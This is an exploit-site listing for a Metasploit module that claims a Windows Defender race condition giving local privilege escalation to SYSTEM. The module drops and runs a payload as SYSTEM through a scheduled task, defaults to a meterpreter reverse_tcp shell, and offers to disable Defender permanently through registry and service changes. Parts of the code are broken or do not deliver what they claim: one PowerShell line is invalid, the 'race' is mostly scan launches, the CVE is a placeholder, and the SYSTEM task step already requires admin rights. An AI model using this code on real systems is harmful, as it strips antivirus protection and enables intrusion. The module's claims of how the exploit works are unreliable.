Share
## https://sploitus.com/exploit?id=PACKETSTORM:223818
==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================
[+] Summary : A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation.
This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation',
'Description' => %q{
A race condition exists between Windows Defender's MpCleanCallbackFunction
(cleanup routine) and Volume Shadow Copy creation. This vulnerability
allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
The exploit uses:
- Fake ISO mount via OpenVirtualDisk / AttachVirtualDisk
- Real-time priority escalation (REALTIME_PRIORITY_CLASS)
- Speed racing against Defender's cleanup routine
Successful exploitation results in:
1. Local Privilege Escalation to SYSTEM via CreateProcessAsUser
2. Use-after-free condition causing Windows Defender to crash
3. System remains without antivirus protection
Tested on Windows 10/11 with Windows Defender enabled.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'Platform' => ['win'],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows x64', { 'Arch' => ARCH_X64 }],
['Windows x86', { 'Arch' => ARCH_X86 }]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'EXITFUNC' => 'thread'
},
'References' => [
['URL', 'https://www.microsoft.com/'],
['CVE', '2026-XXXXX']
],
'DisclosureDate' => '2026-06-11',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('RACE_ITERATIONS', [false, 'Number of race iterations', 100]),
OptBool.new('DISABLE_DEFENDER', [false, 'Attempt to permanently disable Defender', false]),
OptBool.new('CLEANUP', [true, 'Restore Defender functionality after exploit', true])
])
end
def check
defender_pid = get_defender_pid
if defender_pid
print_good("Windows Defender is running (PID: #{defender_pid})")
return CheckCode::Appears
end
CheckCode::Safe
end
def get_defender_pid
processes = client.sys.process.get_processes
processes.each do |proc|
if proc['name'] && proc['name'].downcase == 'msmpeng.exe'
return proc['pid']
end
end
nil
end
def get_system_version
version = sysinfo['OS']
print_status("Target OS: #{version}")
version
end
def create_fake_iso
print_status("Creating fake ISO file for mount operation...")
iso_path = "#{datastore['TEMP'] || 'C:\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.iso"
register_file_for_cleanup(iso_path)
iso_content = "CD001" * 512
write_file(iso_path, iso_content)
print_good("Fake ISO created: #{iso_path}")
iso_path
end
def mount_iso(iso_path)
print_status("Mounting fake ISO using VirtualDisk API...")
mount_ps = <<~PS
$isoPath = "#{iso_path}"
try {
Mount-DiskImage -ImagePath $isoPath -PassThru
Write-Host "MOUNT_SUCCESS"
} catch {
Write-Host "MOUNT_FAILED: $($_.Exception.Message)"
}
PS
result = cmd_exec("powershell -Command \"#{mount_ps.gsub('"', '\\"')}\"")
if result.include?("MOUNT_SUCCESS")
print_good("ISO mounted successfully")
return true
else
print_error("Failed to mount ISO: #{result}")
return false
end
end
def unmount_iso(iso_path)
print_status("Unmounting ISO...")
unmount_ps = <<~PS
$isoPath = "#{iso_path}"
try {
Dismount-DiskImage -ImagePath $isoPath
Write-Host "UNMOUNT_SUCCESS"
} catch {
Write-Host "UNMOUNT_FAILED"
}
PS
cmd_exec("powershell -Command \"#{unmount_ps.gsub('"', '\\"')}\"")
end
def set_realtime_priority
print_status("Setting process to realtime priority...")
priority_ps = <<~PS
$process = Get-Process -Id $pid
$process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime
Write-Host "PRIORITY_SET"
PS
result = cmd_exec("powershell -Command \"#{priority_ps.gsub('"', '\\"')}\"")
result.include?("PRIORITY_SET")
end
def trigger_race_condition(iterations)
print_status("Triggering race condition (#{iterations} iterations)...")
race_ps = <<~PS
$iterations = #{iterations}
$successCount = 0
for ($i = 0; $i -lt $iterations; $i++) {
try {
$vss = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible")
Start-Process -FilePath "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden
$testFile = "C:\\Windows\\Temp\\race_test_$i.txt"
"test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue
Remove-Item $testFile -ErrorAction SilentlyContinue
$successCount++
} catch {
Write-Host "RACE_TRIGGERED_AT_$i"
}
Start-Sleep -Milliseconds 50
}
Write-Host "COMPLETED:$successCount"
PS
result = cmd_exec("powershell -Command \"#{race_ps.gsub('"', '\\"')}\"")
if result.include?("RACE_TRIGGERED")
print_good("Race condition triggered successfully!")
return true
else
print_warning("Race condition may not have triggered")
return false
end
end
def check_defender_status
status_ps = <<~PS
$service = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
if ($service) {
Write-Host "DEFENDER_STATUS:$($service.Status)"
} else {
Write-Host "DEFENDER_STATUS:NOT_FOUND"
}
PS
result = cmd_exec("powershell -Command \"#{status_ps.gsub('"', '\\"')}\"")
result.match(/DEFENDER_STATUS:(\w+)/)&.captures&.first
end
def disable_defender_persistence
print_status("Attempting to permanently disable Windows Defender...")
disable_ps = <<~PS
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
$regPath = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue
$rtpPath = "$regPath\\Real-Time Protection"
New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue
Write-Host "DEFENDER_DISABLED"
PS
result = cmd_exec("powershell -Command \"#{disable_ps.gsub('"', '\\"')}\"")
result.include?("DEFENDER_DISABLED")
end
def restore_defender
print_status("Restoring Windows Defender...")
restore_ps = <<~PS
Remove-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
Start-Service -Name WinDefend -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
Write-Host "DEFENDER_RESTORED"
PS
cmd_exec("powershell -Command \"#{restore_ps.gsub('"', '\\"')}\"")
end
def execute_system_payload
print_status("Attempting to execute payload as SYSTEM...")
payload_exe = generate_payload_exe
payload_path = "#{datastore['TEMP'] || 'C:\\\\Windows\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.exe"
write_file(payload_path, payload_exe)
register_file_for_cleanup(payload_path)
exec_ps = <<~PS
$payload = "#{payload_path}"
try {
$winlogon = Get-Process -Name winlogon
$token = [System.IntPtr]::Zero
[System.IntPtr]::$token = $winlogon.Handle
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = $payload
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true
[System.Diagnostics.Process]::Start($startInfo)
Write-Host "PAYLOAD_EXECUTED_M1"
} catch {
Write-Host "M1_FAILED: $($_.Exception.Message)"
}
try {
$taskName = "TempTask#{Rex::Text.rand_text_alpha(6)}"
schtasks /create /tn $taskName /tr $payload /sc once /st 00:00 /ru SYSTEM /f
schtasks /run /tn $taskName
schtasks /delete /tn $taskName /f
Write-Host "PAYLOAD_EXECUTED_M2"
} catch {
Write-Host "M2_FAILED"
}
PS
result = cmd_exec("powershell -Command \"#{exec_ps.gsub('"', '\\"')}\"")
if result.include?("PAYLOAD_EXECUTED")
print_good("Payload executed as SYSTEM!")
return true
else
print_warning("Payload execution may have failed: #{result}")
return false
end
end
def exploit
print_status("CVE-2026-XXXXX - Windows Defender MsMpEng.exe Race Condition LPE")
print_status("Target: #{sysinfo['Computer']}")
unless is_admin?
print_warning("Not running as admin - exploit may fail")
end
defender_pid = get_defender_pid
unless defender_pid
print_error("Windows Defender is not running. Exploit may not work.")
return
end
print_good("Windows Defender is running (PID: #{defender_pid})")
original_defender_status = check_defender_status
set_realtime_priority
iso_path = create_fake_iso
unless mount_iso(iso_path)
print_warning("ISO mount failed, continuing anyway...")
end
iterations = datastore['RACE_ITERATIONS'] || 100
race_success = trigger_race_condition(iterations)
unmount_iso(iso_path)
new_defender_pid = get_defender_pid
if new_defender_pid != defender_pid
print_good("Windows Defender appears to have crashed/restarted!")
else
print_warning("Windows Defender still running - race condition may not have succeeded")
end
execute_system_payload
if datastore['DISABLE_DEFENDER']
disable_defender_persistence
print_good("Windows Defender persistence disabled")
end
if datastore['CLEANUP']
restore_defender
print_good("Windows Defender restored")
end
print_good("Exploit completed - Check for SYSTEM session")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================